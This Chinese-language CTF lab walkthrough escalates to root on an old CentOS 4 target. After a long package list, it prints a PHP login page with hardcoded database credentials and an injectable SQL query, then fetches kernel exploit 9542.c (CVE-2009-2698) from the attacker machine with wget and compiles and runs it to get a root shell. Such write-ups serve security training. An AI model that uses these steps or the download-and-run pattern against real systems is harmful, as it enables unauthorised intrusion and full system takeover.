gd-2.0.28-5.4E
gtk2-2.4.13-22
gnome-keyring-0.4.0-1
libgnomecanvas-2.8.0-1
pygtk2-libglade-2.4.0-1
libgnome-2.8.0-2
libgnomeui-2.8.0-1
gnome-python2-bonobo-2.6.0-3
apr-util-0.9.4-21
httpd-manual-2.0.52-32.ent.centos4
mod_perl-1.99_16-4.centos4
mod_ssl-2.0.52-32.ent.centos4
squid-2.5.STABLE14-1.4E
webalizer-2.01_10-25
samba-client-3.0.10-1.4E.11
perl-HTML-Parser-3.35-6
perl-XML-Parser-2.34-5
perl-XML-Dumper-0.71-2
xorg-x11-font-utils-6.8.2-1.EL.18
urw-fonts-2.2-6.1
xorg-x11-xfs-6.8.2-1.EL.18
usermode-gtk-1.74-2
system-config-nfs-1.2.8-1
libogg-1.1.2-1
mysql-4.1.22-2.el4
alsa-utils-1.0.6-6
comps-extras-10.1-1
ntp-4.2.0.a.20040617-6.el4
authconfig-gtk-4.6.10-rhel4.3
system-config-keyboard-1.2.5-1
system-config-packages-1.2.23-1
system-config-soundcard-1.2.10-2.EL4
system-logviewer-0.9.12-0.2
gnutls-1.0.20-3.2.3
libmng-1.0.8-1
qt-3.3.3-10.RHEL4
Xaw3d-1.5-24
psgml-1.2.5-4
tk-8.4.7-2
emacspeak-17.0-7
emacs-21.3-19.EL.4
pciutils-devel-2.1.99.test8-3.4
byacc-1.9-28
diffstat-1.31-5
flex-2.5.4a-33
libattr-devel-2.4.16-3.1.el4
libcap-devel-1.10-20
libogg-devel-1.1.2-1
db4-devel-4.2.52-7.1
doxygen-1.3.9.1-1
libtool-libs-1.5.6-4.EL4.1.c4.4
ltrace-0.4-3.el4
boost-devel-1.32.0-6.rhel4
kernel-devel-2.6.9-55.EL
kernel-smp-devel-2.6.9-55.EL
libusb-devel-0.1.8-3
dialog-1.0.20040731-3
ncurses-devel-5.4-13
perl-Convert-ASN1-0.18-3
perl-XML-Grove-0.46alpha-27
perl-LDAP-0.31-5
pkgconfig-0.15.0-3
rcs-5.7-26
splint-3.1.1-4
sysfsutils-devel-1.2.0-1
valgrind-callgrind-0.10.1-2.EL4
gdb-6.3.0.0-1.143.el4
gmp-devel-4.1.4-3
indent-2.2.9-6
krb5-devel-1.3.4-47
libidn-devel-0.5.6-1
automake17-1.7.9-5
automake15-1.5-13
bison-1.875c-2
perl-XML-LibXML-Common-0.13-7
pstack-1.2-6
python-devel-2.3.4-14.4
dbus-devel-0.22-12.EL.9
rpm-build-4.3.3-22_nonptl
slang-devel-1.4.9-8
texinfo-4.7-5.el4.2
libgcj-devel-3.4.6-8
libxml2-devel-2.6.16-10
curl-devel-7.12.1-11.el4
cyrus-sasl-devel-2.1.19-5.EL4
glibc-headers-2.3.4-2.36
gcc-3.4.6-8
gcc-g77-3.4.6-8
libtool-1.5.6-4.EL4.1.c4.4
libuser-devel-0.52.5-1.el4.1
python-ldap-2.0.1-2
systemtap-runtime-0.5.12-1
tog-pegasus-2.5.1-2.EL4
libdbi-0.6.5-10.RHEL4.1
vsftpd-2.0.1-5.EL4.5
perl-DBD-MySQL-2.9004-3.1
MySQL-python-1.2.1_p2-1.el4.1
nmap-3.70-1
xdelta-1.1.3-15
zsh-4.2.0-4.EL.4.5
screen-4.0.2-5
arptables_jf-0.0.8-2
comps-4.5CENTOS-0.20070506
php-ldap-4.3.9-3.26
php-4.3.9-3.26
mysql-server-4.1.22-2.el4
hwdata-0.146.28.EL-1
rootfiles-8-1
termcap-5.4-3
audit-libs-1.0.15-3.EL4
e2fsprogs-1.35-12.5.el4
gdbm-1.8.0-24
libattr-2.4.16-3.1.el4
device-mapper-1.02.17-3.el4
db4-4.2.52-7.1
mktemp-1.5-20
iproute-2.6.9-3.EL4.7
less-382-4.rhel4
perl-Filter-1.30-6
setserial-2.17-17
tcl-8.4.7-2
file-4.10-3.EL4.5
ed-0.2-36
coreutils-5.2.1-31.6
krb5-libs-1.3.4-47
procps-3.2.3-8.6
pyxf86config-0.3.19-1
shadow-utils-4.0.3-61.RHEL4
rpm-4.3.3-22_nonptl
cracklib-dicts-2.8.9-1.3
selinux-policy-targeted-1.17.30-2.145
hal-0.4.2-6.EL4
which-2.16-4
cyrus-sasl-md5-2.1.19-5.EL4
passwd-0.68-10.1
system-config-mouse-1.2.9-1
rmt-0.4b39-3.EL4.2
bluez-hcidump-1.11-1
elfutils-0.97.1-4
lha-1.14i-17
libgcrypt-1.2.0-3
lsof-4.72-1.4
crontabs-1.10-7
libibumad-1.0.1-7
pam_passwdqc-0.7.5-2
aspell-0.50.5-4.EL4
desktop-file-utils-0.9-3.el4
rdist-6.1.5-38.40.2
rsync-2.6.3-1
ntsysv-1.3.13.5.EL4-1
libibverbs-1.0.4-7
talk-0.17-26
traceroute-1.4a12-24.EL4.1
words-3.0-3.2
fontconfig-2.2.3-7.centos4
jwhois-3.2.2-6.EL4.1
libpng-1.2.7-1.el4.2
m4-1.4.1-16
irda-utils-0.9.16-3
bind-libs-9.2.4-24.EL4
OpenIPMI-1.4.14-1.4E.17
bc-1.06-17.1
diskdumputils-1.3.25-1
python-elementtree-1.2.6-5.el4.centos
lockdev-1.0.1-6.2
slocate-2.7-13.el4.6
syslinux-2.11-1
umb-scheme-3.2-36.EL4
utempter-0.5.5-5
xmlsec1-1.2.6-3
at-3.1.8-80_EL4
sudo-1.6.7p5-30.1.3
cyrus-sasl-plain-2.1.19-5.EL4
isdn4k-utils-3.2-18.p1.1
gnupg-1.2.6-9
openssh-clients-3.9p1-8.RHEL4.20
sendmail-8.13.1-3.2.el4
iptstate-1.3-4
pciutils-2.1.99.test8-3.4
rp-pppoe-3.5-22
up2date-4.5.5-5.centos4
cups-1.1.22-0.rc1.9.20
yum-2.4.3-3.el4.centos
libart_lgpl-2.3.16-3
esound-0.2.35-2
ORBit2-2.12.0-3
libbonobo-2.8.0-2
4Suite-1.0-3
pango-1.6.0-9
libglade2-2.4.0-5
gnome-vfs2-2.8.2-8.2
gnome-python2-2.6.0-3
httpd-2.0.52-32.ent.centos4
mod_python-3.1.3-5.1
samba-common-3.0.10-1.4E.11
perl-libwww-perl-5.79-5
perl-XML-Encoding-1.01-26
ttmkfdir-3.0.9-20.el4
system-config-services-0.8.15-1
libvorbis-1.1.0-1
dbus-python-0.22-12.EL.9
system-config-date-1.7.15-0.RHEL4.3
system-config-rootpassword-1.1.6-1
system-config-network-1.3.22.0.EL.4.2-1
sgml-common-0.6.3-17
emacs-leim-21.3-19.EL.4
tclx-8.3.5-4
dmraid-devel-1.0.0.rc14-5_RHEL4_U5
ctags-5.5.4-1
hesiod-devel-3.0.2-30
libf2c-3.4.6-8
db4-utils-4.2.52-7.1
libvorbis-devel-1.1.0-1
bzip2-devel-1.0.2-13.EL4.3
libtermcap-devel-2.0.8-39
automake14-1.4p6-12
perl-XML-NamespaceSupport-1.08-6
perl-XML-Twig-3.13-6
redhat-rpm-config-8.0.32.1-4
valgrind-3.1.1-1.EL4
gdbm-devel-1.8.0-24
cvs-1.11.17-9.RHEL4
autoconf-2.59-5
automake16-1.6.3-5
perl-XML-LibXML-1.58-1
readline-devel-4.3-13
rpm-devel-4.3.3-22_nonptl
libgcj-3.4.6-8
openssl-devel-0.9.7a-43.16
glibc-kernheaders-2.4-9.1.100.EL
gcc-c++-3.4.6-8
java-1.4.2-gcj-compat-1.4.2.0-27jpp
openldap-devel-2.2.13-7.4E
systemtap-0.5.12-1
mysqlclient10-3.23.58-4.RHEL4.1
mx-2.0.5-3
open-1.4-21
bluez-pin-0.23-3
openldap-clients-2.2.13-7.4E
gpg-pubkey-443e1821-421f218f
php-mysql-4.3.9-3.26
提权思路 数据库提权,内核提权,软件漏洞提权和脏牛提权。
看一下网页源码
ls -al
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1733 Feb 9 2012 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
bash-3.00$ cat index.php
cat index.php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
$username = $_POST['uname'];
$password = $_POST['psw'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
//print $query."<br>";
$result = mysql_query($query);
$row = mysql_fetch_array($result);
//print "ID: ".$row['id']."<br />";
}
?>
<html>
<body>
<?php
if ($row['id']==""){
?>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>
<?php
} //END of login form
?>
<!-- Start of HTML when logged in as Administator -->
<?php
if ($row['id']==1){
?>
<form name="ping" action="pingit.php" method="post" target="_blank">
<table width='600' border='1'>
<tr valign='middle'>
<td colspan='2' align='center'>
<b>Welcome to the Basic Administrative Web Console<br></b>
</td>
</tr>
<tr valign='middle'>
<td align='center'>
Ping a Machine on the Network:
</td>
<td align='center'>
<input type="text" name="ip" size="30">
<input type="submit" value="submit" name="submit">
</td>
</td>
</tr>
</table>
</form>
<?php
}
?>
</body>
用"john", "hiroshima"尝试连接数据库
mysql -ujohn -p
mysql -ujohn -p
Enter password: hiroshima
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 38 to server version: 4.1.22
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
查询敏感信息
数据库中密码和数据库登录密码相同,但是没有用
尝试内核提权
searchsploit -m 9542.c
Exploit: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/9542
Path: /usr/share/exploitdb/exploits/linux_x86/local/9542.c
Codes: CVE-2009-2698
Verified: True
File Type: C source, ASCII text
Copied to: /home/wyh/9542.c
只能在x86编译 kali上不能编译
在kali开启web服务
python2 -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.131 - - [25/Aug/2023 10:17:15] "GET /9542.c HTTP/1.0" 200 -
让靶机访问kali,下载9524.c,编译并运行
cd /tmp
cd /tmp
bash-3.00$ ls
ls
bash-3.00$ wget 192.168.1.128/9542.c
wget 192.168.1.128/9542.c
--06:44:08-- http://192.168.1.128/9542.c
=> `9542.c'
Connecting to 192.168.1.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,535 (2.5K) [text/plain]
100%[====================================>] 2,535 --.--K/s
06:44:08 (268.62 MB/s) - `9542.c' saved [2535/2535]
bash-3.00$ ls
ls
9542.c
bash-3.00$ gcc 9542.c -o 9542
gcc 9542.c -o 9542
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
ls
9542 9542.c
bash-3.00$ ./ 9542
./ 9542
注意:只能打开tmp目录下载 只有这个目录有写入权限
ls -l
total 158
drwxr-xr-x 2 root root 4096 Aug 23 03:08 bin
drwxr-xr-x 4 root root 1024 Oct 7 2009 boot
drwxr-xr-x 10 root root 6520 Aug 23 02:03 dev
drwxr-xr-x 80 root root 12288 Aug 23 03:08 etc
drwxr-xr-x 4 root root 4096 Oct 12 2009 home
drwxr-xr-x 2 root root 4096 Feb 21 2005 initrd
drwxr-xr-x 12 root root 4096 Aug 23 03:08 lib
drwx------ 2 root root 16384 Oct 7 2009 lost+found
drwxr-xr-x 2 root root 4096 Feb 9 2012 media
drwxr-xr-x 2 root root 4096 May 3 2007 misc
drwxr-xr-x 3 root root 4096 Oct 8 2009 mnt
drwxr-xr-x 2 root root 4096 Feb 21 2005 opt
dr-xr-xr-x 106 root root 0 Aug 22 22:02 proc
drwxr-x--- 2 root root 4096 Oct 12 2009 root
drwxr-xr-x 2 root root 12288 Oct 7 2009 sbin
drwxr-xr-x 2 root root 4096 Oct 7 2009 selinux
drwxr-xr-x 2 root root 4096 Feb 21 2005 srv
drwxr-xr-x 9 root root 0 Aug 22 22:02 sys
drwxr-xrwx 4 root root 4096 Aug 23 06:44 tmp
drwxr-xr-x 14 root root 4096 Oct 7 2009 usr
drwxr-xr-x 21 root root 4096 Oct 7 2009 var
再次查看id 提权成功
sh-3.00# id
id
uid=0(root) gid=0(root) groups=48(apache)